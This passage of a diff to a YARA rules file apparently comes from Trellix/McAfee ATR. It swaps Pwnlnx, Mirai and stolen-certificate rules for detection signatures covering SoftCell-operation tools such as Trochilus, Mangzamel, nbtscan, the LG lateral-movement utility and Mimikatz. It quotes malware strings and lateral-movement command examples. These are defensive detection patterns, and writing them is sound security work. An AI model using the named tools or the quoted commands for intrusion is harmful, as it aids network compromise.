7F??EB??8B????488D??????????89??4889??E8????????8B????4863??488D??????????8B??????????4889??89??E8????????85??75??EB??8B????48984801????488B????483B????7C??488B????4889??E8????????B8????????488B????C9C3554889??534881??????????4889??????????E8????????4889??E8????????C7????????????488B??????????8B????89????488B??????????8B??89????488B??????????8B????89????8B????8B????BA????????89??89??E8????????89????83??????75??E9????????488D????BA????????BE????????4889??E8????????C7????????????C7????????????8B????89????4883????FF????FF????FF????E8????????4883????89????488D????BE????????4889??E8????????488D????8B????BA????????4889??89??E8????????85??75??E9????????488D??????????4889??E8????????488D??????????BE????????4889??E8????????488D??????????8B????BA????????4889??89??E8????????85??75??EB??488D????8B????BA????????4889??89??E8????????85??75??EB??488D????BE????????4889??E8????????8B????4883????FF????FF????FF????E8????????4883????39??74??EB??8B????83????74??EB??8B????4883????FF????FF????FF????89??E8????????4883????908B????89??E8????????B8????????488B????C9C3554889??4889????89????C7????????????488B????4889????C7????????????EB??488B????0FB6??8B????99F7????89??48980FB6??????????31??89??488B????88??83??????4883??????8B????3B????7C??488B????5DC3554889??4889????89????488B????4889????C7????????????EB??488B????0FB6??0FB6??????????31??488B????88??83??????4883??????8B????3B????7C??488B????5DC39090554889??534881??????????89??????????48C7????????????48C7????????????48C7????????????8B????89??488D??????????8B??????????4889??89??E8????????85??75??E9????????8B????89??488D??????????89??4889??E8????????488D??????????488D??????????4889??4889??E8????????488D??????????488D??????????4889??BA????????BE????????4889??B8????????E8????????488D??????????4889??E8????????4883????4889??E8????????4889????4883??????75??E9????????488D??????????488B????4889??4889??E8????????488D????488D??????????B9????????BA????????4889??E8????????89????83??????0F8E????????C7????????????E9????????488B????8B????4863??48C1????4801??488B??488D????488D??????????488D??????????4989??4889??BA????????BE????????4889??B8????????E8????????488D??????????488D??????????4889??4889??E8????????85??0F85????????48C7????????????48C7????????????488D??????????4883????4889??E8????????4889??E8????????4989??488B??????????8B??????????25????????89??8B??????????25????????89??488B????8B????4863??48C1????4801??488B??488D????488D??????????415052FF????FF????4189??4189??BA????????BE????????4889??B8????????E8????????4883????488B????4889??E8????????4889??488D?????????? }
+		$s1 = "Cannot create folder %sDCRC failed in the encrypted file %s. Corrupt file or wrong password." fullword wide
+		$s2 = "Extracting files to %s folder$Extracting files to temporary folder" fullword wide
+		$s3 = "&Enter password for the encrypted file:" fullword wide
+		$s4 = "start \"\" \"%CD%\\mcoemcpy.exe\"" fullword ascii
+		$s5 = "setup.bat" fullword ascii
+		$s6 = "ErroraErrors encountered while performing the operation" fullword wide
+		$s7 = "Please download a fresh copy and retry the installation" fullword wide
+		$s8 = "antivir.dat" fullword ascii
+		$s9 = "The required volume is absent2The archive is either in unknown format or damaged" fullword wide
+		$s10 = "=Total path and file name length must not exceed %d characters" fullword wide
+		$s11 = "Please close all applications, reboot Windows and restart this installation\\Some installation files are corrupt." fullword wide
+		$op0 = { e8 6f 12 00 00 84 c0 74 04 32 c0 eb 34 56 ff 75 }
+		$op1 = { 53 68 b0 34 41 00 57 e8 61 44 00 00 57 e8 31 44 }
+		$op2 = { 56 ff 75 08 8d b5 f4 ef ff ff e8 17 ff ff ff 8d }
 
 	condition:
-		uint16( 0 ) == 0x457f and filesize < 4000KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 500KB and ( pe.imphash ( ) == "dbb1eb5c3476069287a73206929932fd" and all of them )
 }
-rule TRELLIX_ARC_Pwnlnx_Backdoor_Variant_4 : BACKDOOR FILE
+
+rule TRELLIX_ARC_Trochilus_Softcell : TROJAN FILE
 {
 	meta:
-		description = "Rule to detect the backdoor pwnlnx variant 4"
-		author = "Marc Rivero | McAfee ATR Team"
-		id = "199bb534-f0f6-5b67-aedd-3eada5e45cc6"
-		date = "2020-04-17"
+		description = "Rule to detect Trochilus malware used in the SoftCell operation"
+		author = "Trellix ARC Team"
+		id = "81e942ae-936f-5952-8d50-ee8cec74520b"
+		date = "2019-06-25"
 		modified = "2020-08-14"
-		reference = "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-decade-of-the-rats.pdf"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_decade_of_RATs.yar#L99-L129"
+		reference = "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_Operation_SoftCell.yar#L74-L106"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "2590ab56d46ff344f2aa4998efd1db216850bdddfc146d5d37e4b7d07c7336fc"
-		logic_hash = "11203beee446aaf0783d3a8d3839a88ef16c27d52be8670d650ebf6a1de2c3aa"
+		logic_hash = "80a0841a08627acf11707f3aeef4e7c3777aecf04b932755efa618d7e92b0cda"
 		score = 75
 		quality = 70
-		tags = "BACKDOOR, FILE"
+		tags = "TROJAN, FILE"
 		rule_version = "v1"
-		malware_type = "backdoor"
-		malware_family = "Backdoor:W32/Pwnlnx"
-		actor_type = "Cybercrime"
+		malware_type = "trojan"
+		malware_family = "Trojan:W32/Trochilus"
+		actor_type = "Apt"
 		actor_group = "Unknown"
 
 	strings:
-		$bp = { 7F??4C4602??01??000000000000000001??3E????000000000000000000000000000000000000????????????000000000000??????0000000040??????????????000014??000003??0000474E55????9FECFBE5??F973??EB??2A??????????71??BD????????0000000000000000554889??53E8????????FF????????????4889??4889??4881??????????FF????????????4889??5BC9C30F1F??????554889??E8????????FF????????????C9C366666666????????????????????554889??E8????????4885??74??4C8B????4D85??74??65??8B????????????8B??????????4889??????????48C7??????????89??C1????C1????01??25????????29??48984C89????????????FF??????????C9C3660F1F????????????31??C9C36666662E????????????????554889??E8????????4889??????????48C7??????????FF??????????C9C390554889??E8????????8B??????????488B??????????488D????0FB6????3C??400F94??3C??410F94??74??4084??75??B8????????C9C30F1F????????????8B??????????39????74??3B????74??4584??74??8B??????????4801??0FB7??????????66????74??66??????75??4889??41FF??B8????????C9C30F1F??4084??74??8B??????????4801??0FB7??????????66????75??EB??0F1F????554889??534883????E8????????31??4889??31??E8????????483D????????77??4885??74??488B????488B????488B????488B????4889??????????31??4889??E8????????31??4883????5BC9C383????EB??662E0F1F????????????554889??415453E8????????4989??4889??31??31??E8????????483D????????77??488B????31??4889??488B????488B????488B????488B??????????4989????4889??????????E8????????31??5B415CC9C383????EB??0F1F??????554889??534883????E8????????31??4889??31??E8????????483D????????77??4885??74??488B????488B????488B????488B????4889??????????31??4889??E8????????31??4883????5BC9C383????EB??662E0F1F????????????554889??415453E8????????4989??4889??31??31??E8????????483D????????77??488B????31??4889??488B????488B????488B????488B??????????4989????4889??????????E8????????31??5B415CC9C383????EB??0F1F??????554889??534883????E8????????31??4889??BE????????E8????????483D????????77??4885??74??488B????4889????31??4889??E8????????31??4883????5BC9C383????EB??660F1F??????554889??415453E8????????4989??4889??BE????????31??E8????????483D????????77??488B????31??4889??488B????4989????488B????4889????E8????????31??5B415CC9C383????EB??554889??4157415641554154534883????E8????????4889??488D????4989??4189??4889??BA????????4989??4489????4D89??E8????????488B??????????448B????4881??????????488D????75??EB??0F1F????488B????4881??????????488D????74??0FB7????4839??75??4883????31??5B415C415D415E415FC9C30F1F??????4D89??4C89??4489??4889??4C89??FF??????????4883????5B415C415D415E415FC9C30F1F????554889??4157415641554154534883????E8????????65??8B????????????4889????4889????4189??8B??????????4889??B9????????48C7??????????4889??4D89??4589??89??C1????C1????01??25????????29??F3A648984C8B????????????0F84????????B9????????48C7??????????4889??F3A60F84????????31??4585??4889??4889????4489????74??418D??????31??488D??????0FB6??4883????4889??48C1????48C1????4801??4801??4839??488D????488D????75??89????488D????4C89??E8????????4885??4889??0F84????????488B????4885??74??81????????????0F84????????488B??????????483D????????4C8D????75??EB??0F1F??????498B????483D????????4C8D????74??498B??4889??E8????????85??75??31??4883????5B415C415D415E415FC9C34589??4D89??488B????4489??4889??488B????FF??????????4883????5B415C415D415E415FC9C30F1F??????????81????????????0F85????????31??EB??488D????4C89??E8????????4885??4889??74??498B????488B??????????488B????4885??74??31??4889??4889????FF??4885??488B????0F84????????31??E9????????0F1F????????????554889??534883????E8????????89??488B??????????4881??????????488D????74??66??????75??EB??0F1F????66??????74??488B????483D????????488D????4889??75??4883????5BC9C3E8????????4889??E8????????4883????5BC9C36666662E????????????????554889??534883????E8????????89??488B??????????4881??????????488D????74??66??????75??EB??0F1F????66??????74??488B????483D????????488D????4889??75??4883????5BC9C3E8????????4889??E8????????4883????5BC9C36666662E????????????????554889??534883????E8????????89??488B??????????4881??????????488D????74??66??????75??EB??0F1F????66??????74??488B????483D????????488D????4889??75??4883????5BC9C3E8????????4889??E8????????4883????5BC9C36666662E????????????????554889??534883????E8????????89??488B??????????4881??????????488D????74??66??????75??EB??0F1F????66??????74??488B????483D????????488D????4889??75??4883????5BC9C3E8????????4889??E8????????4883????5BC9C36666662E????????????????554889??534883????E8????????89??488B??????????4881??????????488D????74??66??????75??EB??0F1F????66??????74??488B????483D????????488D????4889??75??4883????5BC9C3E8????????4889??E8????????4883????5BC9C36666662E????????????????554889??41554154534883????E8????????4C8B??????????4989??4981??????????498D??????75??EB??0F1F????4C8B????4981??????????498D??????74??488B??4C89??E8????????85??75??4C89??E8????????488B??E8????????4889??E8????????4883????5B415C415DC9C36666662E????????????????554889??534883????E8????????488B??????????BA????????89??BF????????E8????????4885??74??66????488B??????????488D????48C7??????????E8????????4883????5BC9C30F1F????554889??534883????E8????????488B??????????BA????????89??BF????????E8????????4885??74??66????488B??????????488D????48C7??????????E8????????4883????5BC9C30F1F????554889??534883????E8????????488B??????????BA????????89??BF????????E8????????4885??74??66????488B??????????488D????48C7??????????E8????????4883????5BC9C30F1F????554889??534883????E8????????488B??????????BA????????89??BF????????E8????????4885??74??66????488B??????????488D????48C7??????????E8????????4883????5BC9C30F1F????554889?? }
+		$s1 = "Shell.dll" fullword ascii
+		$s2 = "photo.dat" fullword wide
+		$s3 = "VW9HxtV9H|tQ9" fullword ascii
+		$s4 = "G6uEGRich7uEG" fullword ascii
+		$op0 = { e8 9d ad ff ff ff b6 a8 }
+		$op1 = { e8 d4 ad ff ff ff b6 94 }
+		$op2 = { e8 ea ad ff ff ff b6 8c }
 
 	condition:
-		uint16( 0 ) == 0x457f and filesize < 400KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and ( pe.imphash ( ) == "8e13ebc144667958722686cb04ee16f8" and ( pe.exports ( "Entry" ) and pe.exports ( "Main" ) ) and all of them )
 }
-rule TRELLIX_ARC_Pwnlnx_Backdoor_Variant_6 : BACKDOOR FILE
+
+rule TRELLIX_ARC_Lg_Utility_Lateral_Movement_Softcell : UTILITY FILE
 {
 	meta:
-		description = "Rule to detect the backdoor pwnlnx variant 6"
+		description = "Rule to detect the utility LG from Joeware to do Lateral Movement in the SoftCell operation"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "56bfe9c7-4cd4-51f6-a469-da8af52d64c2"
-		date = "2020-04-17"
+		id = "4f435348-427a-5f35-9545-5582033eb043"
+		date = "2019-06-25"
 		modified = "2020-08-14"
-		reference = "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-decade-of-the-rats.pdf"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_decade_of_RATs.yar#L131-L161"
+		reference = "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_Operation_SoftCell.yar#L108-L143"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "d29254ab907c9ef54349de3ec0dd8b22b4692c58ed7a7b340afbc6e44363f96a"
-		logic_hash = "29423135a46ee7b9aa1bd8f1e6f7ffad09725787ad6e75312e1d34b18e3917d4"
+		logic_hash = "f88781b9632cd31bb9e3d68730c63c3fcd0ebe4a09b70b5b54d456cdc9ae8d01"
 		score = 75
 		quality = 70
-		tags = "BACKDOOR, FILE"
-		rule_version = "v1"
-		malware_type = "backdoor"
-		malware_family = "Backdoor:W32/Pwnlnx"
-		actor_type = "Cybercrime"
+		tags = "UTILITY, FILE"
+		rule_version = "v1"
+		malware_type = "utility"
+		malware_family = "Utility:W32/Joeware"
+		actor_type = "Apt"
 		actor_group = "Unknown"
 
 	strings:
-		$bp = { 7F??4C4602??01??000000000000000001??3E????000000000000000000000000000000000000??????09??00000000000000004000000000??????2B??28??04??000014??000003??0000474E55????4D9585????AB6522????52AD3B??EC9B4BE8????????0000000000000000????00000000554889??????????4889??41544989??534889??488B??????????E8????????4C89??4889??48C7??????????FF??????????488B??????????89??E8????????89??5B415C5DC30F1F??E8????????554889??????????4889??41544989??534889??488B??????????E8????????4C89??4889??48C7??????????FF??????????488B??????????89??E8????????89??5B415C5DC30F1F??E8????????554889??415541544989??534889??4883????488B??????????65??8B????????????4889????31??E8????????4889??4C89??FF??????????488B??????????4189??E8????????488B??????????483D????????488D????75??EB??0F1F??????488B????4881??????????488D????74??0FB7??488D????48C7??????????31??E8????????498B????498B??????488D????488D????????????BA????????E8????????4885??74??4981??????????????488B????65??33????????????4489??75??4883????5B415C415D5DC3E8????????0F1F??E8????????554889??415541544989??534889??4883????488B??????????65??8B????????????4889????31??E8????????4889??4C89??FF??????????488B??????????4189??E8????????488B??????????483D????????488D????75??EB??0F1F??????488B????4881??????????488D????74??0FB7??488D????48C7??????????31??E8????????498B????498B??????488D????488D????????????BA????????E8????????4885??74??4981??????????????488B????65??33????????????4489??75??4883????5B415C415D5DC3E8????????0F1F??E8????????554889??415541544989??534889??4883????488B??????????65??8B????????????4889????31??E8????????4889??4C89??FF??????????488B??????????4189??E8????????488B??????????483D????????488D????75??EB??0F1F??????488B????4881??????????488D????74??0FB7??488D????48C7??????????31??E8????????498B????498B??????488D????488D????????????BA????????E8????????4885??74??4981??????????????488B????65??33????????????4489??75??4883????5B415C415D5DC3E8????????0F1F??E8????????554889??415541544989??534889??4883????488B??????????65??8B????????????4889????31??E8????????4889??4C89??FF??????????488B??????????4189??E8????????488B??????????483D????????488D????75??EB??0F1F??????488B????4881??????????488D????74??0FB7??488D????48C7??????????31??E8????????498B????498B??????488D????488D????????????BA????????E8????????4885??74??4981??????????????488B????65??33????????????4489??75??4883????5B415C415D5DC3E8????????0F1F??E8????????554889??41574589??415641554189??4154534889??4883????488B??????????4889????4889????4C89????483D????????4C8D????74??4C63??EB??0F1F??????498B????483D????????4C8D????74??498B??4C89??4889??E8????????85??75??4883????5B415C415D415E415F5DC30F1F??????????4589??4C8B????488B????4489??4889??488B????FF??????????4883????5B415C415D415E415F5DC3660F1F??????E8????????554889??41574589??41564D89??41554989??41544189??BA????????534889??488D????4883????4889????4889??65??8B????????????4889????31??E8????????488B??????????4881??????????488D????74??0FB7????4839??75??EB??0F1F????????????410FB7????4839??74??4C8B????4981??????????498D????75??4589??4D89??4C89??4489??4889??488B????FF??????????488B????65??33????????????75??4883????5B415C415D415E415F5DC3660F1F??????31??EB??E8????????0F1F??????662E0F1F????????????E8????????55BF????????4889??4881??????????65??8B????????????4889????31??488D??????????FF????????????B9????????4889??488D??????????F3??A5488D??????????48C7??????????BE????????B1??E8????????4885??74??48BA???????? }
+		$s1 = "lg \\\\comp1\\users louise -add -r comp3" fullword ascii
+		$s2 = "lg \\\\comp1\\users S-1-5-567-678-89765-456 -sid -add" fullword ascii
+		$s3 = "lg \\\\comp1\\users -sidsout" fullword ascii
+		$s4 = "Enumerates members of localgroup users on localhost" fullword ascii
+		$s5 = "Adds SID resolved at comp3 for louise to localgroup users on comp1" fullword ascii
+		$s6 = "CodeGear C++ - Copyright 2008 Embarcadero Technologies" fullword ascii
+		$s7 = "Lists members of localgroup users on comp1 in SID format" fullword ascii
+		$s8 = "ERROR: Verify that CSV lines are available in PIPE input. " fullword ascii
+		$op0 = { 89 43 24 c6 85 6f ff ff ff 00 83 7b 24 10 72 05 }
+		$op1 = { 68 f8 0e 43 00 e8 8d ff ff ff 83 c4 20 68 f8 0e }
+		$op2 = { 66 c7 85 74 ff ff ff 0c 00 8d 55 d8 52 e8 e9 eb }
 
 	condition:
-		uint16( 0 ) == 0x457f and filesize < 700KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 600KB and ( pe.imphash ( ) == "327ce3f883a5b59e966b5d0e3a321156" and all of them )
 }
-rule TRELLIX_ARC_Mirai_Casper_Variant : BACKDOOR FILE
+
+rule TRELLIX_ARC_Mangzamel_Softcell : TROJAN FILE
 {
 	meta:
-		description = "Rule to detect the Mirai Casper variant"
+		description = "Rule to detect Mangzamel used in the SoftCell operation"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "0f3a028c-9514-51cd-ad82-415e8ac2dee7"
-		date = "2020-04-17"
+		id = "b0473362-7e03-5127-aee5-b5a4f05bcc8e"
+		date = "2019-06-25"
 		modified = "2020-08-14"
-		reference = "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-decade-of-the-rats.pdf"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_decade_of_RATs.yar#L163-L193"
+		reference = "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_Operation_SoftCell.yar#L145-L176"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "57cc422a6a90c571198a2d1c3db13c31fbdb48ba2f0f4356846d6d636d0f9300"
-		logic_hash = "5449d1ef0c4977c6151fc194ad5f526b6be414c1efb7fd4bacb77d4bcd89c703"
+		logic_hash = "3666c645943eb8469096b8093c74e4d819299d3ffc2b99e37a506d8ef09e90c4"
 		score = 75
 		quality = 70
-		tags = "BACKDOOR, FILE"
+		tags = "TROJAN, FILE"
 		rule_version = "v1"
-		malware_type = "backdoor"
-		malware_family = "Backdoor:W32/Pwnlnx"
-		actor_type = "Cybercrime"
+		malware_type = "trojan"
+		malware_family = "Trojan:W32/Mangzamel"
+		actor_type = "Apt"
 		actor_group = "Unknown"
 
 	strings:
-		$bp = { 7F??4C4601??01??000000000000000002??03??01??0000E0??04??34??000088??????????000034??20??05????????????????000000000000000080??????80??????15????????0C??05????????10??????0000??????0C??40A510??40A510??80??????904A0000060000000010????????0000D4??0000D4??04??D4??04??440000??????????????000004??0000070000??????0C??40A510??40A510??14??000030??000004??000004??000051E5??64????000000000000000000000000000000000000060000??????000004??000010??000001??0000474E5500000000????0000????0000????0000??????000014??000003??0000474E55??????3A??87????529723????2C??08??????AB35????????2A??0000BC????????0000????A510??2A??0000C4??????????0000C8??????2A??0000CCA510??2A??00005589??5383????E8????????5B81??????????8B??????????85??74??E8????????E8????????E8????????585BC9C3FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????000000000000000031??5E89??83????50545268????????68????????515668????????E8????????F490909090909090909090909090905589??538D??????80????????????75??BB????????A1????????81??????????C1????83????39??73??908D??????83????A3????????FF????????????A1????????39??72??B8????????85??74??C7????????????E8????????C6????????????8D??????5B5DC3908D??????55B8????????89??8D??????E8????????5A81??????????85??74??89??????C7??????????????C7??????????????C7????????????E8????????A1????????85??74??B8????????85??74??C7????????????FF??C9C39090905589??83????8B????88????A1????????85??74??A1????????0FB6????88??83????A3????????EB??C7??????????????8D????89??????C7????????????E8????????C9C35589??83????EB??8B????0FB6??0FBE??83??????89????E8????????8B????0FB6??84??75??C9C35589??83????8B????0FB6??88????83??????80??????0F84????????80??????74??0FBE????89????E8????????E9????????C7????????????8B????0FB6??88????83??????80??????75??C7????????????8B????0FB6??88????83??????EB??80??????75??C7????????????8B????0FB6??88????83??????C7????????????EB??8B????89??C1????01??01??89??0FBE????8D????83????89????8B????0FB6??88????83??????80??????7E??80??????7E??80??????74??80??????75??83??????8B????0FB6??88????83??????80??????0F84????????0FB6????88????80??????7E??0FB6????83????88????0FBE????83????83????0F87????????8B????????????FF??8B????8D????89????8B??89????C7????????????EB??83??????8B????8B????8D????0FB6??84??75??EB??C7????????????E8????????8B????83????85??75??8B????3B????0F92??83??????84??75??8B????89????E8????????EB??C7????????????E8????????8B????3B????0F92??83??????84??75??E9????????8B????8D????89????8B??0FBE??89????E8????????E9????????C7????????????EB??C7????????????EB??C7????????????EB??C7????????????EB??0FBE????89????E8????????E9????????8B????83????85??74??8B????8D????89????8B??EB??80??????75??8B????8D????89????8B??EB??8B????8D????89????8B??89????80??????75??8B????85??79??F7????83??????C7????????????8B????BA????????F7????89??88????8B????BA????????F7????89????80??????7E??80??????75??B8????????EB??B8????????0FB6????01??88????8B????0FB6????83????88??????83??????83??????74??83??????76??8B????83????85??74??8B????C6????????83??????8B????89????8B????83????84??74??B8????????EB??B8????????88????EB??0FBE????89????E8????????8B????83????85??75??8B????3B????0F92??83??????84??75??83??????8B????0FB6??????0FBE??89????E8????????83??????75??EB??C7????????????E8????????8B????3B????0F92??83??????84??75??E9????????E9????????90EB??90C9C35589??83????8D????89????8B????89??????8B????89????E8????????C9C35589??83????8B????8B????88????88????C9C35589??57565381??????????8B????8B????88??????????88??????????C7??????????????????C7??????????????????0FB6??????????C7??????????????C7??????????????8B????89??????89????E8????????89??????????0FB6??????????C7??????????????C7??????????????8B????89??????89????E8????????89??????????0FB6??????????C7??????????????C7??????????????8B????89??????89????E8????????89??????????0FB6??????????C7??????????????C7??????????????8B????89??????89????E8????????89??????????0FB6??????????C7??????????????C7??????????????8B????89??????89????E8????????89??????????0FB6??????????C7??????????????C7??????????????8B????89??????89????E8????????66????????????8D??????????BA????????89??????C7??????????????89????E8????????83????????????0F84????????83????????????0F84????????8B??????????89????E8????????3D????????0F8F????????8B??????????89????E8????????83????0F8F????????8B??????????89????E8????????83????0F8F????????C7??????????????????EB??8B??????????03??????????0FB6??3C??7E??8B??????????03??????????0FB6??3C??7F??8B??????????03??????????8B??????????03??????????0FB6??83????88??8B??????????83????89??????????8B??????????89????E8????????8B??????????39??7F??81??????????????????7E??C7??????????????????C7????????????E8????????C7????????????E8????????C7????????????E8????????C7????????????E8????????C7????????????E8????????C7????????????E8????????C7????????????E8????????C7????????????E8????????C7????????????E8????????C7????????????E8????????C7????????????E8????????8B??????????C7??????????????89????E8????????89??????????C7??????????????????E9????????8B??????????69??????????03??????????C6??????8B??????????69??????????03??????????C7??????????8B??????????69??????????89??03??????????0FB6??????????8B??????????89??C1????F7??89??89??89??01??01??C1????03????8B????89????8B??????????69??????????03??????????8D??????????8B??????????89??????89????E8????????8B??????????69??????????03??????????0FB6??????????3C??74??8B??????????69??????????03??????????05????????89????E8????????8B??????????69??????????03??????????8D??????????8B??????????69??????????03??????????81??????????83????89??????89??????89????E8????????8B??????????69??????????03??????????C6????????????8B??????????69??????????03??????????8D??????????8B??????????89??????89????E8????????8B??????????69??????????03??????????8D??????????8B??????????89??????89????E8????????8B??????????69??????????03??????????8D??????????8B??????????89??????89????E8????????0FB6??????????8B??????????89??C1????F7??89??89??89??01??01??C1????03????0FB6????3C??0F87????????8B??????????69??????????89??03??????????0FB6??????????8B??????????89??C1????F7??89??89??89??01??01??C1????03????8B????89????E8????????89??E8????????89??0FB6??????????8B??????????89??C1????F7??89??89??89??01??01??C1????03????0FB6????0FB6??89??89??D3??89??8D????89????E8????????89????E8????????89??BA????????89??F7??89??C1????89??C1????01??89??29??83????0F87????????8B????????????FF??C7????????????E8????????C7??????????????C7????????????E8????????8B??????????69??????????03??????????83????89??????89????E8????????C7????????????E8????????E9????????C7????????????E8????????C7??????????????C7????????????E8????????8B??????????69??????????03??????????83????89??????89????E8????????C7????????????E8????????E9????????C7????????????E8????????C7??????????????C7????????????E8????????8B??????????69??????????03??????????83????89??????89????E8????????C7???????????? }
+		$s1 = "Change Service Mode to user logon failure.code:%d" fullword ascii
+		$s2 = "spoolsvs.exe" fullword wide
+		$s3 = "System\\CurrentControlSet\\Services\\%s\\parameters\\%s" fullword ascii
+		$s4 = "Please Correct [-s %s]" fullword ascii
+		$s5 = "Please Correct [-m %s]" fullword ascii
+		$op0 = { 59 8d 85 64 ff ff ff 50 c7 85 64 ff ff ff 94 }
+		$op1 = { c9 c2 08 00 81 c1 30 34 00 00 e9 cf 9b ff ff 55 }
+		$op2 = { 80 0f b6 b5 68 ff ff ff c1 e2 04 0b d6 0f b6 b5 }
 
 	condition:
-		uint16( 0 ) == 0x457f and filesize < 3000KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and ( pe.imphash ( ) == "ef64bb4aa42ef5a8a2e3858a636bce40" and all of them )
 }
 
-rule TRELLIX_ARC_APT_Stolen_Certificates : BACKDOOR FILE
+rule TRELLIX_ARC_Nbtscan_Utility_Softcell : UTILITY FILE
 {
 	meta:
-		description = "Rule to detect samples digitally signed from these stolen certificates"
+		description = "Rule to detect nbtscan utility used in the SoftCell operation"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "57051977-780c-5c8e-bc66-0f1d8b3bbd93"
-		date = "2020-04-17"
+		id = "a2a8dd43-0d30-5da5-9dd3-6ba9f6473c40"
+		date = "2019-06-25"
 		modified = "2020-08-14"
-		reference = "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-decade-of-the-rats.pdf"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_decade_of_RATs.yar#L196-L221"
+		reference = "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_Operation_SoftCell.yar#L178-L209"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "ce3424524fd1f482a0339a3f92e440532cff97c104769837fa6ae52869013558"
-		logic_hash = "9b700e4889349d0203bdd4e00035ee9c9aba5025ccc57eef915b2c78996f8160"
+		logic_hash = "6079f1363578f82fd38971d0c8f69cc156f7f678c3f2be22c5d9c3748dc80b1f"
 		score = 75
-		quality = 70
-		tags = "BACKDOOR, FILE"
+		quality = 45
+		tags = "UTILITY, FILE"
 		rule_version = "v1"
-		malware_type = "backdoor"
-		malware_family = "Backdoor:W32/Pwnlnx"
-		actor_type = "Cybercrime"
+		malware_type = "utility"
+		malware_family = "Utility:W32/NbtScan"
+		actor_type = "Apt"
 		actor_group = "Unknown"
 
+	strings:
+		$s1 = "nbtscan 1.0.35 - 2008-04-08 - http://www.unixwiz.net/tools/" fullword ascii
+		$s2 = "parse_target_cb.c" fullword ascii
+		$s3 = "ranges. Ranges can be in /nbits notation (\"192.168.12.0/24\")" fullword ascii
+		$s4 = "or with a range in the last octet (\"192.168.12.64-97\")" fullword ascii
+		$op0 = { 52 68 d4 66 40 00 8b 85 58 ff ff ff 50 ff 15 a0 }
+		$op1 = { e9 1c ff ff ff 8b 45 fc 8b e5 5d c3 cc cc cc cc }
+		$op2 = { 59 59 c3 8b 65 e8 ff 75 d0 ff 15 34 60 40 00 ff }
+
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "/C=KR/ST=Seoul/L=Gangnam-gu/O=LivePlex Corp/CN=LivePlex Corp" and pe.signatures [ i ] . serial == "3f:55:42:e2:e7:1d:8d:b3:57:04:1c:9d:d4:5b:95:0a" or pe.signatures [ i ] . subject contains "/C=KR/ST=Seoul/L=Gangnam-gu/O=LivePlex Corp/CN=LivePlex Corp" and pe.signatures [ i ] . serial == "3f:55:42:e2:e7:1d:8d:b3:57:04:1c:9d:d4:5b:95:0a" or pe.signatures [ i ] . subject contains "/C=KR/ST=Seoul/L=Gangnam-gu/O=LivePlex Corp/CN=LivePlex Corp" or pe.signatures [ i ] . serial == "3f:55:42:e2:e7:1d:8d:b3:57:04:1c:9d:d4:5b:95:0a" )
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and ( pe.imphash ( ) == "2fa43c5392ec7923ababced078c2f98d" and all of them )
 }
-rule TRELLIX_ARC_Chimera_Recordedtv_Modified : TROJAN FILE
+
+rule TRELLIX_ARC_Mimikatz_Utility_Softcell : HACKTOOL FILE
 {
 	meta:
-		description = "Rule to detect the modified version of RecordedTV.ms found in the Operation Skeleton"
+		description = "Rule to detect Mimikatz utility used in the SoftCell operation"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "b0969713-41a4-550c-9545-f02783fa8d02"
-		date = "2020-04-21"
+		id = "0c01a2f6-cf3c-57b3-8f19-94d320422658"
+		date = "2019-06-25"
 		modified = "2020-08-14"
-		reference = "https://medium.com/@cycraft_corp/taiwan-high-tech-ecosystem-targeted-by-foreign-apt-group-5473d2ad8730"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_operation_skeleton.yar#L1-L33"
+		reference = "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers"
